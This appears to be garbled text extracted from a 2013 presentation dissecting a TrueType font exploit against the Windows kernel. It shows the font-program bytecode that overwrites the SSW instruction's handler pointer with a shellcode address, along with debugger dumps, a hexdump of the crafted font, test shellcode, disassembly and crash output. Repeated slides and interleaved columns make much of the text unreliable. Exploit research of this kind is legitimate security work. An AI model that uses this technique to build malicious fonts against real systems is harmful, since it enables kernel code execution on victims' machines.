00108:
00109:
00111:
00112:
00113:
00115:
00116:
00117:
00119:
00120:
Friday, March 8, 2013
PUSHB[1]
RS
PUSHB[1]
ADD
DUP
PUSHB[1]
SWAP
WS
PUSHB[1]
SUB
NOT
PUSHB[1]
SWAP
JROT
0
1
0
80
49
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
00101: JROT
00102:
00104:
00105:
00107:
00108:
00109:
00111:
00112:
00113:
00115:
00116:
00117:
00119:
00120:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80
SUB
NOT
PUSHB[1] 49
SWAP
JROT ; 169 (exit)
Another Sanity Check
Friday, March 8, 2013
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
00101: JROT
00102:
00104:
00105:
00107:
00108:
00109:
00111:
00112:
00113:
00115:
00116:
00117:
00119:
00120:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80
SUB
NOT
PUSHB[1] 49
SWAP
JROT ; 169 (exit)
Ditto
Friday, March 8, 2013
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT ;(89+13=102)
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
00101: JROT
00102:
00104:
00105:
00107:
00108:
00109:
00111:
00112:
00113:
00115:
00116:
00117:
00119:
00120:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80
SUB
NOT
PUSHB[1] 49
SWAP
JROT ; 169 (exit)
Possibly a test for 64-bit
Friday, March 8, 2013
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT ;(89+13=102)
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
00144:
00146:
00147:
00149:
00150:
PUSHB[1] 0
RS
PUSHB[1] 3
ADD
RCVT
;
;
;
;
;
;
00151: PUSHB[1] 80 ;
00153: ADD
;
00154: PUSHB[1] 0 ;
00156: RS
;
00157: SWAP
;
00158: WCVTP
;
;
;
00159: PUSHB[1] 1
00161: SSW
;
iteration
0x2c
iteration + offset of 3
0x2f
e2482318 -> DataPGM
[GlobalGS+0x2e*4]
0x50 shelcode offset
Total e2482368
Stack: 0x00, e2482368
Stack: 0x2c, e2482368
Stack: e2482368, 0x2c
ControlValueTable+0x2c*4 =
00090: PUSHB[1] 1
GlobalGS+0x2b*4
=
00092: RS
GlobalGS+0xAC
00093: PUSHB[1] 3
Call
00095:
00096:
Shellcode
00097:
00098:
00100:
RS
SUB
NOT
PUSHB[1] 43
SWAP
00101: JROT ;101+43
Friday, March 8, 2013
00144:
00146:
00147:
00149:
00150:
;
;
;
;
;
;
00151: PUSHB[1] 80 ;
00153: ADD
;
00154: PUSHB[1] 0 ;
00156: RS
;
00157: SWAP
;
00158: WCVTP
;
;
;
00159: PUSHB[1] 1
00161: SSW
;
Friday, March 8, 2013
PUSHB[1] 0
RS
PUSHB[1] 3
ADD
RCVT
iteration
0x2c
iteration + offset of 3
0x2f
e2482318 -> DataPGM
[GlobalGS+0x2e*4]
0x50 shelcode offset
Total e2482368
Stack: 0x00, e2482368
Stack: 0x2c, e2482368
Stack: e2482368, 0x2c
ControlValueTable+0x2c*4 =
GlobalGS+0x2b*4 =
GlobalGS+0xAC
Call Shellcode
00144:
00146:
00147:
00149:
00150:
PUSHB[1] 0
RS
PUSHB[1] 3
ADD
RCVT
; iteration
; 0x2c
; iteration + offset of 3
; 0x2f
; e2482318 -> DataPGM
; [GlobalGS+0x2e*4]
00151:e2481f80
PUSHB[1]
80 ; 0x50 shelcode offset
00000000
dd e2481f84 L100
00153:kd>ADD
; Total e2482368
e2481afc e2481f00 e2481f80 00030004
00154:e2481f84
PUSHB[1]
0 ; Stack: 0x00, e2482368
e2481f94 00040000 00000000 00000000 00000000
00156:e2481fa4
RS
Stack:00000000
0x2c, 00000000
e2482368
00000000 ;00000044
bf85c269
00157:e2481fb4
SWAP 00000000 ;00000000
Stack:00000040
e2482368,
0x2c
00000000 00000000
+0x25;00000000
00158:e2481fc4
WCVTP 00000003
ControlValueTable+0x2c*4
=
e2481fd4 00030009 00000080 00000001 00000044
GlobalGS+0x2b*4
=
e2481fe4 auto_flip
00000000 ;00000000
00000000 00000000
GlobalGS+0xAC
e2481ff4 00000040 ;bf85c269
00000003 00000000
00000000
00000000 00030009 00010080
00159:e2482004
PUSHB[1]
1
e2482014 00000001 e2481f80 e2481f80 00000000
00161:e2482024
SSW
Call Shellcode
00000000 ;bf85bd4b
bf85bd4b e2482368
e2482034
e2482044
e2482054
e2482064
Friday, March 8, 2013e2482074
+0x29
e24bdbb3
00000000
00000000
00002000
00002000
+0x2A
0000000d
00000000
00000000
00000400
00000400
e2482318
00000000
00000000
00000080
00000080
+0x2F
0003b89b
00000000
00000000
0000000a
0000000a
+0x2C
00144:
00146:
00147:
00149:
00150:
;
;
;
;
;
;
00151: PUSHB[1] 80 ;
00153: ADD
;
00154: PUSHB[1] 0 ;
00156: RS
;
00157: SWAP
;
00158: WCVTP
;
;
;
00159: PUSHB[1] 1
00161: SSW
;
Friday, March 8, 2013
PUSHB[1] 0
RS
PUSHB[1] 3
ADD
RCVT
iteration
0x2c
iteration + offset of 3
0x2f
e2482318 -> DataPGM
[GlobalGS+0x2e*4]
0x50 shelcode offset
Total e2482368
Stack: 0x00, e2482368
Stack: 0x2c, e2482368
Stack: e2482368, 0x2c
ControlValueTable+0x2c*4 =
GlobalGS+0x2b*4 =
GlobalGS+0xAC
Call Shellcode
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
Font Program Starts here
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
...
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
*
00000150
00000160
00000170
*
0003b9a0
0003b9b0
0003b9c0
0003b9d0
0003b9e0
0003b9f0
...
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
00 00 00 00 00 00 00 00
ff 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 e8 fb ff ff
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
|................|
|................|
|................|
00
05
b9
00
00
00
00
00
ca
00
00
00
|.....\..........|
|.~z._.<.........|
|.........i......|
|................|
|...........d...Y|
|................|
00
7e
9a
01
01
0b
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
7a
15
00
00
00
00000000
Friday, March 8, 2013
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
1c
96
01
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
7f
5f
00
00
00
00
03
00
03
03
03
03
03
03
03
03
03
40
00
5c
0f
00
00
00
00
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
3c
00
00
00
00
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
f5
00
0c
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
01
09
69
01
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
08
0a
00
00
00
E8FBFFFFFF
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
00
00
d3
00
64
00
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
00
00
00
00
00
00
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
00
00
00
00
0a
00
67
79
61
65
74
63
78
6d
73
65
c0
00
00
19
00
00
00
00
00
9a
00
00
00
59
00
call 0x0
00149: ADD
00150: RCVT
; 0x2f
; e2482318 -> DataPGM
; [GlobalGS+0x2e*4]
00151: PUSHB[1] 80 ; 0x50 shelcode offset
00153: ADD
; Total e2482368
00154: PUSHB[1] 0 ; Stack: 0x00, e2482368
00156: RS
; Stack: 0x2c, e2482368
00157: SWAP
; Stack: e2482368, 0x2c
00158:
WCVTP
; ControlValueTable+0x2c*4 =
...
00000060 00 00 00 00 00 03 ba;d0GlobalGS+0x2b*4
00 00 00 02 66 70 67 6d =|............fpgm|
00000070 7f 06 e9 00 00 00 01 0c 00 03 b8 9b 67 6c 79 66 |............glyf|
00000080 18 d3 69 4b 00 03 ba;e4GlobalGS+0xAC
00 00 00 bc 68 65 61 64 |..iK........head|
00000090 db b2 28 94 00 03 b9 a8 00 00 00 36 68 68 65 61 |..(........6hhea|
00159:
PUSHB[1] 1
000000a0 00 16 00 be 00 03 b9 e0 00 00 00 24 68 6d 74 78 |...........$hmtx|
000000b0 00
82 00 1e 00 03 ba;7cCall
00 00 Shellcode
00 0e 6c 6f 63 61 |.......|....loca|
00161:
SSW
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
*
00000150
00000160
00000170
*March 8, 2013
Friday,
00
01
1c
9c
8b
01
00
5e
08
d0
11
9d
c0
00
00
00
3a
3e
ff
63
00
00
23
db
69
81
b8
00
00
00
00
00
00
3a
00
03
03
03
03
03
40
00
ba
ba
bb
bd
ba
60
00
d4
04
a0
1c
c0
b8
00
00 00 00 00 00 00 00 00
ff 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00
00
00
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
60
00
0e
20
7c
35
0d
1c
00
70
65
74
70
b8
00
00
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
00 00 00 00 e8 fb ff ff
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
|................|
|................|
|................|
fpgm
6d
6e
70
70
b8
00
00
61
61
6f
72
7f
00
00
78
6d
73
65
c0
00
00
+0x50
00153:
00154:
00156:
00157:
00158:
ADD
PUSHB[1] 0
RS
SWAP
WCVTP
00159: PUSHB[1] 1
00161: SSW
;
;
;
;
;
;
;
;
;
Total e2482368
Stack: 0x00, e2482368
Stack: 0x2c, e2482368
Stack: e2482368, 0x2c
ControlValueTable+0x2c*4 =
GlobalGS+0x2b*4 =
GlobalGS+0xAC
(SSW pops an argument)
Call Shellcode
e2481f80 00000000
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
e2481f94 00040000 00000000 00000000
e2481fa4 00000000 00000044 00000000
e2481fb4 00000000 00000000 00000040
e2481fc4 00000003 00000000 00000000
e2481fd4 00030009 00000080 00000001
e2481fe4 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003
[CVT+0xAC]
= “SSW”
e2482004 00000000
00000000
00030009
e2482014 00000001 e2481f80 e2481f80
e2482024 00000000 bf85bd4b bf85bd4b
e2482034 e24bdbb3 0000000d e2482318
Friday, March 8, 2013
e2482044 00000000 00000000 00000000
00030004
00000000
00000000
bf85c269
00000000
00000044
00000000
00000000
00010080
00000000
e2482368
offset: +0x2C
0003b89b
00000000
; __fastcall itrp_LSW(x, x)
@itrp_LSW@8
proc near
; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp
; itrp_InnerTraceExecute(x,x)+56^Xp
; DATA XREF: ...
kd> dd e2482368
eax, dword_BF9A9234
e2482368 mov
fffffbe8
000000ff 00000000 00000000
push
ebx
e2482378 mov
00000000
00000000 00000000
ebx, 00000000
[eax]
e2482388 push
00000000
esi 00000000 00000000 00000000
push
edi
e2481f80
00000000
mov
dword_BF9A927C,
1110h
kd>
L100
popdd e2481f84
ebx
retn
e2481f84
e2481afc e2481f00 e2481f80 00030004
; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000
loc_BF98B9F9: ...
; CODE XREF: itrp_LSW(x,x)+28^Xj
e2482024
00000000
bf85bd4b bf85bd4b e2482368
sub
ecx,
4
e2482034
mov
dword_BF9A9228,
e24bdbb3 0000000d
ecx
e2482318 0003b89b
mov
movsx
mov
lea
call
mov
mov
pop
pop
pop
retn
endp
00000000
@itrp_LSW@8
Friday, March 8, 2013
ecx, [ecx]
edx, cx
[esi+32h], cx
ecx, [eax+100h]
dword ptr [eax+0ACh]
[esi+8], eax
eax, edi
edi
esi
ebx
[CVT+0xAC] = “SSW”
E8FBFFFFFF
call 0x0
00153:
00154:
00156:
00157:
00158:
ADD
PUSHB[1] 0
RS
SWAP
WCVTP
00159: PUSHB[1] 1
00161: SSW
;
;
;
;
;
;
;
;
;
Total e2482368
Stack: 0x00, e2482368
Stack: 0x2c, e2482368
Stack: e2482368, 0x2c
ControlValueTable+0x2c*4 =
GlobalGS+0x2b*4 =
GlobalGS+0xAC
(SSW pops an argument)
Call Shellcode
e2481f80 00000000
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
e2481f94 00040000 00000000 00000000
e2481fa4 00000000 00000044 00000000
e2481fb4 00000000 00000000 00000040
e2481fc4 00000003 00000000 00000000
e2481fd4 00030009 00000080 00000001
e2481fe4 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003
[CVT+0xAC]
= “SSW”
e2482004 00000000
00000000
00030009
e2482014 00000001 e2481f80 e2481f80
e2482024 00000000 bf85bd4b bf85bd4b
e2482034 e24bdbb3 0000000d e2482318
Friday, March 8, 2013
e2482044 00000000 00000000 00000000
00030004
00000000
00000000
bf85c269
00000000
00000044
00000000
00000000
00010080
00000000
e2482368
offset: +0x2C
0003b89b
00000000
Finalé
Friday, March 8, 2013
00157: SWAP
00158: WCVTP
00159: PUSHB[1] 1
00161: SSW
;
;
;
;
;
;
Stack: e2482368, 0x2c
ControlValueTable+0x2c*4 =
GlobalGS+0x2b*4 =
GlobalGS+0xAC
(SSW pops an argument)
Call Shellcode
; __fastcall itrp_LSW(x, x)
;...
loc_BF98B9F9:
; CODE XREF: itr
sub
ecx, 4
mov
dword_BF9A9228, ecx
mov
ecx, [ecx]
movsx
edx, cx
mov
[esi+32h], cx
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------BUGCHECK_STR:
0x7f_8
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=01
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004
e2481f94 00040000 00000000 00000000 00000000
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------BUGCHECK_STR:
0x7f_8
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=01
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004
e2481f94 00040000 00000000 00000000 00000000
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------BUGCHECK_STR:
0x7f_8
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084
edx=00000001 =esi=e2481fe0
edi=01
[EAX+0xAC]
“SSW()”
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004
e2481f94 00040000 00000000 00000000 00000000
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------BUGCHECK_STR:
0x7f_8
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084
edx=00000001 =esi=e2481fe0
edi=01
[EAX+0xAC]
“SSW()”
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
[CVT]=[GlobalGS-4]
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
[CVT+(4*2C)] =
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+0xB0] =
e2481f94 00040000 00000000 00000000 00000000
[GlobalGS+0xB0-4] =
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368 [GlobalGS+0xAC] =
e2482034 e24bdbb3 0000000d e2482318 0003b89b
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------00157: SWAP
00158: WCVTP
BUGCHECK_STR:
0x7f_8
; Stack: e2482368, 0x2c
; ControlValueTable[0x2c]
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084
edx=00000001 =esi=e2481fe0
edi=01
[EAX+0xAC]
“SSW()”
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
[CVT]=[GlobalGS-4]
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
[CVT+(4*2C)] =
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+0xB0] =
e2481f94 00040000 00000000 00000000 00000000
[GlobalGS+0xB0-4] =
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368 [GlobalGS+0xAC] =
e2482034 e24bdbb3 0000000d e2482318 0003b89b
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------00157: SWAP
00158: WCVTP
BUGCHECK_STR:
0x7f_8
; Stack: e2482368, 0x2c
; ControlValueTable[0x2c]
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084
edx=00000001 =esi=e2481fe0
edi=01
[EAX+0xAC]
“SSW()”
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
[CVT]=[GlobalGS-4]
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
[CVT+(4*2C)] =
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+0xB0] =
e2481f94 00040000 00000000 00000000 00000000
[GlobalGS+0xB0-4] =
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368 [GlobalGS+0xAC] =
e2482034 e24bdbb3 0000000d e2482318 0003b89b
Friday, March 8, 2013
; __fastcall itrp_LSW(x, x)
;...
lea
ecx, [eax+100h]
call
dword ptr [eax+0ACh]
mov
[esi+8], eax
Debugging Details:
-----------------00157: SWAP
00158: WCVTP
BUGCHECK_STR:
0x7f_8
[CVT+(4*(2C+3))] + 0x50
; Stack: e2482368, 0x2c
; ControlValueTable[0x2c]
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084
edx=00000001 =esi=e2481fe0
edi=01
[EAX+0xAC]
“SSW()”
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00
[CVT]=[GlobalGS-4]
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
[CVT+(4*2C)] =
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+0xB0] =
e2481f94 00040000 00000000 00000000 00000000
[GlobalGS+0xB0-4] =
...
e2482024 00000000 bf85bd4b bf85bd4b e2482368 [GlobalGS+0xAC] =
e2482034 e24bdbb3 0000000d e2482318 0003b89b
*fpgm
Friday, March 8, 2013
Friday, March 8, 2013
References
Friday, March 8, 2013
TrueType Font Stuff
• Apple’s Developer Website
• Microsoft’s Developer Website
• Possibly Adobe’s web site if you’re lucky
(most links seem to be broken currently)
• Wikipedia, Google, you know...
Friday, March 8, 2013
Other People’s Stuff,
Which I Just Found
• Lee Ling Chuan, and Chan Lee Yee
Black-Hat Europe 2012, and PacSec Oct 2012
“GDI Font Fuzzing in Windows Kernel for Fun”
• Ivan Teblin
Virus Bulletin, Dallas, 05 Oct 2012
“Anatomy of Duqu exploit”
Friday, March 8, 2013
Oh yeah, by the way, for reference, this is the storage area array.
The RS(0) and WS(0) were the loop iteration offset walking
through CVT. It was 0x2C at crash (shellcode) time.
kd> dd e2481f00
e2481f00 0000002c
e2481f10 00000000
e2481f20 00000000
e2481f30 00000000
e2481f40 00000000
e2481f50 00000000
e2481f60 00000000
Friday, March 8, 2013
bf85bd4b
00000000
00000000
00000000
00000000
00000000
00000000
bf85bd4b
00000000
00000000
00000000
00000000
00000000
00000000
bf85bd4b
00000000
00000000
00000000
00000000
00000000
00000000
Oh yeah, by the way, for reference, this is the storage area array.
The RS(0) and WS(0) were the loop iteration offset walking
through CVT. It was 0x2C at crash (shellcode) time.
kd> dd e2481f00
e2481f00 0000002c bf85bd4b bf85bd4b bf85bd4b
e2481f10 00000000 00000000 00000000 00000000
e2481f20 00000000
Debugging00000000
Details:00000000 00000000
e2481f30 00000000
00000000 00000000 00000000
-----------------e2481f40 00000000 00000000 00000000 00000000
e2481f50 00000000
00000000
00000000 00000000
BUGCHECK_STR:
0x7f_8
e2481f60 00000000 00000000 00000000 00000000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e24
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
e2482368 e8fbffffff
call
e2482368
Resetting default scope e2481f80 00000000
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004
e2481f94 00040000 00000000 00000000 00000000
Friday, March 8, 2013
...